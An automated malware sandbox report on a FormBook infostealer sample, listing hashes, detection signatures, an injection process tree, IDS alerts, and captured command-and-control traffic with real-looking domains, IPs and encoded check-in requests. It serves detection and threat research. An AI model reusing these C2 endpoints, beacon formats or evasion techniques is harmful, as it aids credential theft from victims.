
Windows Analysis Report
xaqnaB0rcW.exe

Overview

General Information

Sample name: xaqnaB0rcW.exe (renamed because original name is a hash value)
Original sample name: dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9.exe
Analysis ID: 1589075
MD5: dd5acffde51ef27c585911dea96c4336
SHA1: 62a6b77a79d556fe171fdafea079fc88e400c42e
SHA256: dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • xaqnaB0rcW.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\xaqnaB0rcW.exe" MD5: DD5ACFFDE51EF27C585911DEA96C4336)
    • svchost.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\xaqnaB0rcW.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HSxcaEmiOTH.exe (PID: 1104 cmdline: "C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TCPSVCS.EXE (PID: 7884 cmdline: "C:\Windows\SysWOW64\TCPSVCS.EXE" MD5: 73905DB831B4F37F0673D2DD5BBF7779)
          • HSxcaEmiOTH.exe (PID: 3604 cmdline: "C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ParentImage: C:\Users\user\Desktop\xaqnaB0rcW.exe, ParentProcessId: 7576, ParentProcessName: xaqnaB0rcW.exe, ProcessCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ProcessId: 7636, ProcessName: svchost.exe
Source: Process started | Author: vburov: Data: Command: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ParentImage: C:\Users\user\Desktop\xaqnaB0rcW.exe, ParentProcessId: 7576, ParentProcessName: xaqnaB0rcW.exe, ProcessCommandLine: "C:\Users\user\Desktop\xaqnaB0rcW.exe", ProcessId: 7636, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T09:15:09.196526+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49970 | 104.21.28.65 | 80 | TCP
2025-01-11T09:15:11.466798+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49971 | 104.21.28.65 | 80 | TCP
2025-01-11T09:15:13.353106+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49972 | 104.21.28.65 | 80 | TCP
2025-01-11T09:15:22.542645+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49974 | 104.21.54.126 | 80 | TCP
2025-01-11T09:15:25.063268+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49975 | 104.21.54.126 | 80 | TCP
2025-01-11T09:15:27.725310+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49976 | 104.21.54.126 | 80 | TCP
2025-01-11T09:15:36.803552+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49978 | 69.57.163.64 | 80 | TCP
2025-01-11T09:15:39.337096+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49979 | 69.57.163.64 | 80 | TCP
2025-01-11T09:15:41.881785+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49980 | 69.57.163.64 | 80 | TCP
2025-01-11T09:15:50.716775+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49982 | 101.32.205.61 | 80 | TCP
2025-01-11T09:15:53.502097+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 101.32.205.61 | 80 | TCP
2025-01-11T09:15:55.731402+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 101.32.205.61 | 80 | TCP
2025-01-11T09:16:05.145567+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 103.159.36.66 | 80 | TCP
2025-01-11T09:16:07.695434+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 103.159.36.66 | 80 | TCP
2025-01-11T09:16:10.742732+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 103.159.36.66 | 80 | TCP

AV Detection

                Source: xaqnaB0rcW.exeVirustotal: Detection: 59%
                Source: xaqnaB0rcW.exeReversingLabs: Detection: 83%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: xaqnaB0rcW.exeJoe Sandbox ML: detected
                Source: xaqnaB0rcW.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HSxcaEmiOTH.exe, 00000004.00000002.2601053518.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, HSxcaEmiOTH.exe, 00000006.00000000.1736924979.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00396CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00396CA9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003960DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003960DD
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003963F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003963F9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0039EB60
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F56F FindFirstFileW,FindClose,0_2_0039F56F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0039F5FA
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1B2F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1C8A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003A1F94
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0041C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0041C4E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then xor eax, eax5_2_00409E40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then pop edi5_2_0040E0F4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then mov ebx, 00000004h5_2_00AE0528

Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 104.21.54.126:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 104.21.54.126:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 104.21.54.126:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 69.57.163.64:80
                Source: DNS query: www.binjai77rtp11f.xyz
                Source: Joe Sandbox ViewIP Address: 69.57.163.64 69.57.163.64
                Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
                Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
                Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003A4EB5
                Source: global trafficHTTP traffic detected: GET /s1oh/?UfjxuDP=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTV07xmH02YSuxOuXTBNCt6lVM/O+JsRG51Y9B+1PgAZMJBQ/X3Nrmukkh&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.3nhc3a.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.binjai77rtp11f.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.vietnamtour.proUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /zbqa/?UfjxuDP=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA9RQKtvF2RwQZX7jt+LR0GxdMQnQscMzB9kd5j+7KhxpY8qBrHtH6UUu4&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.showyourstyle.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.rwse6wjx.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.rokeyfashion.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.3nhc3a.top
                Source: global trafficDNS traffic detected: DNS query: www.binjai77rtp11f.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vietnamtour.pro
                Source: global trafficDNS traffic detected: DNS query: www.showyourstyle.top
                Source: global trafficDNS traffic detected: DNS query: www.rwse6wjx.sbs
                Source: global trafficDNS traffic detected: DNS query: www.rokeyfashion.store
                Source: unknownHTTP traffic detected: POST /9fei/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 220Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.binjai77rtp11f.xyzOrigin: http://www.binjai77rtp11f.xyzReferer: http://www.binjai77rtp11f.xyz/9fei/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like GeckoData Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 4d 4b 5a 34 72 59 2f 47 77 62 57 51 65 58 51 52 7a 30 7a 31 38 7a 78 75 4b 4d 6c 70 75 6f 66 59 69 51 76 66 39 69 38 6d 6b 43 4b 73 6f 4a 33 41 41 3d 3d Data Ascii: UfjxuDP=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGMKZ4rY/GwbWQeXQRz0z18zxuKMlpuofYiQvf9i8mkCKsoJ3AA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 08:14:52 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
